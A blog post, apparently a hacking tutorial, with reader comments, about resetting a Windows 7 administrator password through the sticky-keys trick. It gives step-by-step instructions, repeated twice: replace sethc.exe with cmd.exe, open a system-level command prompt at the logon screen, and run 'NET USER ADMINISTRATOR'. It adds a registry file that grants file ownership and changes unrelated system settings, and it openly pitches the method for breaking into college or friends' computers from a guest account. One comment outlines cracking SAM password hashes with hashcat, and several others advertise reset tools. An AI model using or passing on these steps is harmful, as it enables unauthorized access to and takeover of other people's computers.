"How to Recover Windows 7 Administrator password"
"Ultimate hack"
I am back my reader with new hacking guide. Today i am writing about "recovering windows 7 administrator password" using my hacking guide
Ever wanted to hack your college PC with guest account/student or just wanted to hack your friend’s PC to make him gawk when you tell him your success story of hacking? Well,there is a great way of hacking an administrator account from a guest account by which you can reset the administrator password and getting all the privileges an administrator enjoys on windows.. interested? read on…
Concept:
Press shift key 5 times and the sticky key dialog shows up.This works even at the logon screen. But If we replace the sethc.exe which is responsible for the sticky key dialog,with cmd.exe, and then call sethc.exe by pressing shift key 5 times at logon screen,we will get a command prompt with administrator privileges because no user has logged on. From there we can hack the administrator password,even from a guest account.
Prerequisites:
Guest account with write access to system32.
Here is how to do that -
* Go to C:/windows/system32
* Copy cmd.exe and paste it on desktop
* Rename cmd.exe to sethc.exe
* Copy the new sethc.exe to system 32,when windows asks for overwriting the file,then click yes.
When asked to overwrite,overwrite the sethc.exe
* Now log on from your guest account and at the user select window,press shift key 5 times.
* Instead of sticky Key confirmation dialog,command prompt with full administrator privileges will open.
* Now type “ NET USER ADMINISTRATOR aaa” where “aaa” can be any password you like and press enter.
* You will see “ The command completed successfully” and then exit the command prompt and login into administrator with your new password.
* Congrats You have hacked admin from guest account
Concept:
Press shift key 5 times and the sticky key dialog shows up.This works even at the logon screen. But If we replace the sethc.exe which is responsible for the sticky key dialog,with cmd.exe, and then call sethc.exe by pressing shift key 5 times at logon screen,we will get a command prompt with administrator privileges because no user has logged on. From there we can hack the administrator password,even from a guest account.
Prerequisites:
Guest account with write access to system32.
Here is how to do that -
* Go to C:/windows/system32
* Copy cmd.exe and paste it on desktop
* Rename cmd.exe to sethc.exe
* Copy the new sethc.exe to system 32,when windows asks for overwriting the file,then click yes.
When asked to overwrite,overwrite the sethc.exe
* Now log on from your guest account and at the user select window,press shift key 5 times.
* Instead of sticky Key confirmation dialog,command prompt with full administrator privileges will open.
* Now type “ NET USER ADMINISTRATOR aaa” where “aaa” can be any password you like and press enter.
* You will see “ The command completed successfully” and then exit the command prompt and login into administrator with your new password.
* Congrats You have hacked admin from guest account
Note: If you are getting "try again" error while replacing file, it means you have to take ownership for the file you wanted to replace to do that just copy paste the below line in the notepad and save it as .reg extension file and than run it this will give you an option in the right click menu "Take Ownership". After that just right click on the file name sethc.exe and take ownership
copy paste the line in red
Windows Registry Editor Version 5.00
;Created by Aksclusive
;Created by Aksclusive
[HKEY_CLASSES_ROOT\AllFilesystemObjects\shellex\ContextMenuHandlers\Copy To]
@="{C2FBB630-2971-11D1-A18C-00C04FD75D13}"
[HKEY_CLASSES_ROOT\AllFilesystemObjects\shellex\ContextMenuHandlers\Move To]
@="{C2FBB631-2971-11D1-A18C-00C04FD75D13}"
[HKEY_CURRENT_USER\Control Panel\Desktop]
"AutoEndTasks"="1"
"HungAppTimeout"="1000"
"MenuShowDelay"="8"
"WaitToKillAppTimeout"="2000"
"LowLevelHooksTimeout"="1000"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoLowDiskSpaceChecks"=dword:00000001
"LinkResolveIgnoreLinkInfo"=dword:00000001
"NoResolveSearch"=dword:00000001
"NoResolveTrack"=dword:00000001
"NoInternetOpenWith"=dword:00000001
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control]
"WaitToKillServiceTimeout"="2000"
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RemoteComputer]
[HKEY_CLASSES_ROOT\*\shell\takeownership]
@="Take ownership"
"HasLUAShield"=""
"NoWorkingDirectory"=""
[HKEY_CLASSES_ROOT\*\shell\takeownership\command]
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
[HKEY_CLASSES_ROOT\exefile\shell\takeownership]
@="Take ownership"
"HasLUAShield"=""
"NoWorkingDirectory"=""
[HKEY_CLASSES_ROOT\exefile\shell\takeownership\command]
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
[HKEY_CLASSES_ROOT\dllfile\shell\takeownership]
@="Take ownership"
"HasLUAShield"=""
"NoWorkingDirectory"=""
[HKEY_CLASSES_ROOT\dllfile\shell\takeownership\command]
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
[HKEY_CLASSES_ROOT\Directory\shell\takeownership]
@="Take ownership"
"HasLUAShield"=""
"NoWorkingDirectory"=""
[HKEY_CLASSES_ROOT\Directory\shell\takeownership\command]
@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
If some how you cannot add the about registry values into the window registry try this method, download some Linux distro that can be run from CD/USB (live distro like puppy Linux , Ubuntu.. etc) and boot from Linux OS and than replace file sethc.exe with the renamed cmd.exe
now you done congrats you Recover your windows 7 administrator password with this hack :)
A few days ago, I had met the headache things that I had forgotten Windows login password. The login screen rejected my passwords. I was frustrated because there was very important data on my disk and I couldn't reinstall the OS. ………….
ReplyDeleteHowever, I fortunately got to know the PCUnlocker utility, which is a professional windows password recovery tool for us to reset windows 7 password instantly yet no data loss.
http://www.top-password.com/reset-windows-password.html
That's not recovering the password; it's resetting it. While most people would be happy with that, the correct answer would be burning a Ubuntu LiveCD/DVD, booting from it, finding the encrypted SAM file (c:\windows\system32\config\sam by default), and cracking the passwords using a program like hashcat.
ReplyDeleteIf you are not newbies and not be urgent to reset your forgotten Windows 7 password, above way maybe we can consider, but most people not. So if you need a easy, quick, safe and effective reset tool I recommend Anmosoft, reset software. You can learn more and download from
ReplyDeletehttp://www.resetwindowspassword.com/recover-windows-7-password.html
Personally, admin password and reset disk are the best way to reset Windows 7 password normally. But if above two ways are not helpful or you don't have I think Windows Login Recovery will be your best choice, like "Ekachakra" said.
ReplyDeleteTo hack Windows 7 admin password you can use Windows Password Killer directly, for another ways normally are not effective in your situation.
ReplyDeletehow do I run the .reg notepad file created above admin???
ReplyDeleteIt is a happy tour for me to read your post. Here you can try to use the tool-Windows Password Key to recover Windows 7 administrator password. More details about how to use Windows Password Key to recover Windows 7 administrator password is on here. http://www.lostwindowspassword.com/article/reset-windows-7-administrator-password.html
ReplyDeleteThis comment has been removed by the author.
ReplyDelete